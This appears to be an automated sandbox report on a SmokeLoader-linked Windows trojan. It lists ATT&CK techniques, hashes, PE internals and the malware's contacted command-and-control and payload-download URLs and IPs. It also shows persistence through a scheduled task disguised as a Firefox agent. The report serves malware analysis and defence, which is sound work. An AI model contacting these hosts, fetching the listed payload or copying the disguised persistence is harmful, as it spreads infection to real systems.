Source: Yara match	File source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	411 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
mGFoU1INUk.exe	37%	ReversingLabs
mGFoU1INUk.exe	36%	Virustotal	Browse
mGFoU1INUk.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Roaming\ibjgueh	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\B995.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ibjgueh	37%	ReversingLabs
C:\Users\user\AppData\Roaming\ibjgueh	36%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
nwgrus.ru	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
http://tech-servers.in.net/tmp/index.php	2%	Virustotal		Browse
http://unicea.ws/tmp/index.php	0%	Virustotal		Browse
https://23.145.40.164/ksa9104.exe	0%	Virustotal		Browse
http://nwgrus.ru/tmp/index.php	17%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nwgrus.ru	119.204.11.2	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://tech-servers.in.net/tmp/index.php	true	2%, Virustotal, Browse	unknown
https://23.145.40.164/ksa9104.exe	true	0%, Virustotal, Browse	unknown
http://unicea.ws/tmp/index.php	true	0%, Virustotal, Browse	unknown
http://nwgrus.ru/tmp/index.php	true	17%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000002.00000000.2125963281.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000000.2123955019.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 00000002.00000000.2130431930.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000002.00000000.2130431930.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/	explorer.exe, 00000002.00000000.2125963281.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://excel.office.com	explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000002.00000000.2125269917.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2125238364.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2124617675.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.v	explorer.exe, 00000002.00000000.2122001915.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.com	explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://wns.windows.com/)s	explorer.exe, 00000002.00000000.2125963281.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.145.40.164	unknown	Reserved	22631	SURFAIRWIRELESS-IN-01US	true
119.204.11.2	nwgrus.ru	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
175.119.10.231	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532225
Start date and time:	2024-10-12 20:06:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	mGFoU1INUk.exe renamed because original name is a hash value
Original Sample Name:	18daa2c6a6f6385895582d4e9954d851.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/3@6/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 36 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ibjgueh, PID 2604 because there are no executed function
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
14:07:13	API Interceptor	451041x Sleep call for process: explorer.exe modified
20:07:24	Task Scheduler	Run new task: Firefox Default Browser Agent F1A7C47CB515062F path: C:\Users\user\AppData\Roaming\ibjgueh

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.145.40.164	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse
	O4zPA1oI9Y.exe	Get hash	malicious	SmokeLoader	Browse
	5zA3mXMdtG.exe	Get hash	malicious	SmokeLoader	Browse
119.204.11.2	file.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
119.204.11.2	rBwTlpgnjc.exe	Get hash	malicious	SmokeLoader	Browse	nidoe.org/tmp/index.php
175.119.10.231	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	epohe.ru/tmp/
	Ltoj8zXMGf.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	kCiQWUqQtC.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	setup.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true
	SWjcpYfYPy.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	n8XBpFdVFU.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	sdfjhuz.com/dl/build2.exe
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	sdfjhuz.com/dl/build2.exe
	2LksWs2xq7.exe	Get hash	malicious	SmokeLoader	Browse	nidoe.org/tmp/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nwgrus.ru	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	190.147.2.86
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	187.211.161.52
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	92.36.226.66
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse	201.103.8.135
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse	210.182.29.70
	O4zPA1oI9Y.exe	Get hash	malicious	SmokeLoader	Browse	160.177.223.165
	5zA3mXMdtG.exe	Get hash	malicious	SmokeLoader	Browse	181.52.122.51

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SKB-ASSKBroadbandCoLtdKR	na.elf	Get hash	malicious	Mirai	Browse	222.238.145.97
	na.elf	Get hash	malicious	Unknown	Browse	39.122.198.97
	na.elf	Get hash	malicious	Mirai	Browse	222.238.145.88
	na.elf	Get hash	malicious	Mirai	Browse	1.253.35.1
	na.elf	Get hash	malicious	Mirai	Browse	1.235.113.234
	na.elf	Get hash	malicious	Mirai	Browse	1.248.72.126
	6DroQ0jTFY.elf	Get hash	malicious	Mirai	Browse	58.122.30.38
	cqdEWgq9fW.elf	Get hash	malicious	Mirai	Browse	114.204.119.182
	dNBHFhYkoO.elf	Get hash	malicious	Mirai, Okiru	Browse	58.232.149.105
	0aEXGHNxhO.elf	Get hash	malicious	Mirai, Okiru	Browse	116.124.181.132
KIXS-AS-KRKoreaTelecomKR	na.elf	Get hash	malicious	Mirai	Browse	14.128.205.96
	na.elf	Get hash	malicious	Unknown	Browse	211.55.129.167
	na.elf	Get hash	malicious	Mirai	Browse	14.86.131.44
	na.elf	Get hash	malicious	Mirai	Browse	220.89.51.156
	na.elf	Get hash	malicious	Mirai	Browse	175.239.198.64
	na.elf	Get hash	malicious	Mirai	Browse	125.129.129.17
	na.elf	Get hash	malicious	Mirai	Browse	14.59.217.120
	na.elf	Get hash	malicious	Mirai	Browse	14.86.106.47
	na.elf	Get hash	malicious	Mirai	Browse	1.109.151.172
	na.elf	Get hash	malicious	Mirai	Browse	14.85.6.142
SURFAIRWIRELESS-IN-01US	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	O4zPA1oI9Y.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	5zA3mXMdtG.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
72a589da586844d7f0818ce684948eea	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	O4zPA1oI9Y.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	5zA3mXMdtG.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\B995.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	167865
Entropy (8bit):	6.197261972623414
Encrypted:	false
SSDEEP:	3072:GTAGy4uRrZA2NHJAgrOKePxcq55Q+CoNJk:GTAGyKurN+F4
MD5:	FB7D3959E02DD0DE0E7548C6F7CB2C5D
SHA1:	46CE9F287A834D1AC9970CD8463AB15F402CF51C
SHA-256:	C741E33C801163A9CCBC88DEA39D63B4ECF1A3E533363C925B21EEEBF06576CF
SHA-512:	5D888B9E3289EE384655DBDB04ADF529DB1455A8BB35D3F3E24865BE4A518CC6D8116123304413369655835B4B32D4B2DDFAAC2C2BEF240A51778B3D7E4EB584
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y.......................F.......................Rich..........................PE..L.....Bd.................N....r..............`....@...........................s.....>.......................................tw..<.....r..............................................................................`..\|............................text....L.......N.................. ..`.rdata..& ...`..."...R..............@..@.data...\|.o..........t..............@....kepojon.D....q..8..................@....mizur...(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ibjgueh

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	243200
Entropy (8bit):	5.891193199564729
Encrypted:	false
SSDEEP:	3072:iTAAHnZJKzRKc6jdtPcTui/scq5vQ+CoNAMenJFBxqXYUGrG:iTAa7PCTd+FSMe/qI
MD5:	18DAA2C6A6F6385895582D4E9954D851
SHA1:	88F22A473DF849C91E70A91A8376ABFF2B5B108F
SHA-256:	346085FE3603FBC085F801241CCCDC4D3765929A6CD5F9906CBCFCD6657065A3
SHA-512:	552A9FFBB3A80495A523D7052E940677778AEED5A9569459029A71A4D45CF568CE447A4E79EFEA786CA4220B913F11CE1B4F8819AF48C7078430AEF2DA090F8F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37% Antivirus: Virustotal, Detection: 36%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y.......................F.......................Rich..........................PE..L...Q..f.................P....r..............`....@...........................s......x......................................tw..<.....r..............................................................................`..\|............................text....O.......P.................. ..`.rdata..& ...`..."...T..............@..@.data...\|.o..........v..............@....suhak...D....q..8..................@....fofifuf.(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ibjgueh:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.891193199564729
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	mGFoU1INUk.exe
File size:	243'200 bytes
MD5:	18daa2c6a6f6385895582d4e9954d851
SHA1:	88f22a473df849c91e70a91a8376abff2b5b108f
SHA256:	346085fe3603fbc085f801241cccdc4d3765929a6cd5f9906cbcfcd6657065a3
SHA512:	552a9ffbb3a80495a523d7052e940677778aeed5a9569459029a71a4d45cf568ce447a4e79efea786ca4220b913f11ce1b4f8819af48c7078430aef2da090f8f
SSDEEP:	3072:iTAAHnZJKzRKc6jdtPcTui/scq5vQ+CoNAMenJFBxqXYUGrG:iTAa7PCTd+FSMe/qI
TLSH:	D1342BC26EF17815F2B3CA31DE3992E4E52FF5D29E24725D21A4DA0F08F11A1D92B712
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y............................F............................Rich...........................PE..L...Q..f...

File Icon


Icon Hash:	738733b18ba383e4

Static PE Info

General

Entrypoint:	0x4018e4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x661CE451 [Mon Apr 15 08:24:49 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	636068238a0ab0df9c8e341eee8428d0

Entrypoint Preview

Instruction
call 00007FE54CFF8230h
jmp 00007FE54CFF4B2Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041A3D0h], eax
mov dword ptr [0041A3CCh], ecx
mov dword ptr [0041A3C8h], edx
mov dword ptr [0041A3C4h], ebx
mov dword ptr [0041A3C0h], esi
mov dword ptr [0041A3BCh], edi
mov word ptr [0041A3E8h], ss
mov word ptr [0041A3DCh], cs
mov word ptr [0041A3B8h], ds
mov word ptr [0041A3B4h], es
mov word ptr [0041A3B0h], fs
mov word ptr [0041A3ACh], gs
pushfd
pop dword ptr [0041A3E0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041A3D4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041A3D8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041A3E4h], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041A320h], 00010001h
mov eax, dword ptr [0041A3D8h]
mov dword ptr [0041A2D4h], eax
mov dword ptr [0041A2C8h], C0000409h
mov dword ptr [0041A2CCh], 00000001h
mov eax, dword ptr [00419008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0041900Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000DCh]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17774	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2721000	0x1cac0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16000	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14faf	0x15000	6dc5e30b5d87861babcd358eb53f2106	False	0.8236374627976191	data	7.549565623085082	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x16000	0x2026	0x2200	6da4b7c2534b0027fef7635e158ee334	False	0.36247702205882354	data	5.4153798035975225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x26fff7c	0x1400	3cba851d696b61283dc196131a3cd2a4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.suhak	0x2719000	0x4400	0x3800	b211778b80f6d441b6cf61ada776fc6d	False	0.0025809151785714285	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.fofifuf	0x271e000	0x2800	0x2800	1276481102f218c981e0324180bafd9f	False	0.00322265625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2721000	0x1cac0	0x1cc00	a27998791c525f409926d67585ed7489	False	0.4417119565217391	data	5.078965960078043	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x27219d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5700959488272921
RT_ICON	0x2722878	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6371841155234657
RT_ICON	0x2723120	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.6935483870967742
RT_ICON	0x27237e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7456647398843931
RT_ICON	0x2723d50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5137966804979253
RT_ICON	0x27262f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6128048780487805
RT_ICON	0x27273a0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6180327868852459
RT_ICON	0x2727d28	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7570921985815603
RT_ICON	0x2728208	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.3342217484008529
RT_ICON	0x27290b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.526173285198556
RT_ICON	0x2729958	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.5892857142857143
RT_ICON	0x272a020	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6329479768786127
RT_ICON	0x272a588	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.4270746887966805
RT_ICON	0x272cb30	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.5057377049180328
RT_ICON	0x272d4b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.5044326241134752
RT_ICON	0x272d988	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39498933901918976
RT_ICON	0x272e830	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5546028880866426
RT_ICON	0x272f0d8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6169354838709677
RT_ICON	0x272f7a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6423410404624278
RT_ICON	0x272fd08	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.42706378986866794
RT_ICON	0x2730db0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.4245901639344262
RT_ICON	0x2731738	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.4645390070921986
RT_ICON	0x2731c08	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.28331556503198296
RT_ICON	0x2732ab0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.36913357400722024
RT_ICON	0x2733358	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.37672811059907835
RT_ICON	0x2733a20	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.3786127167630058
RT_ICON	0x2733f88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.25778008298755184
RT_ICON	0x2736530	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.275328330206379
RT_ICON	0x27375d8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.28647540983606556
RT_ICON	0x2737f60	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.32358156028368795
RT_STRING	0x27385f8	0xcc	data			0.553921568627451
RT_STRING	0x27386c8	0x50c	data			0.4473684210526316
RT_STRING	0x2738bd8	0x3aa	data			0.4616204690831556
RT_STRING	0x2738f88	0x52c	data			0.4516616314199396
RT_STRING	0x27394b8	0x652	data			0.4338689740420272
RT_STRING	0x2739b10	0x798	data			0.41975308641975306
RT_STRING	0x273a2a8	0x84c	data			0.4129001883239171
RT_STRING	0x273aaf8	0x666	data			0.4340659340659341
RT_STRING	0x273b160	0x7f6	data			0.4210009813542689
RT_STRING	0x273b958	0x758	data			0.41914893617021276
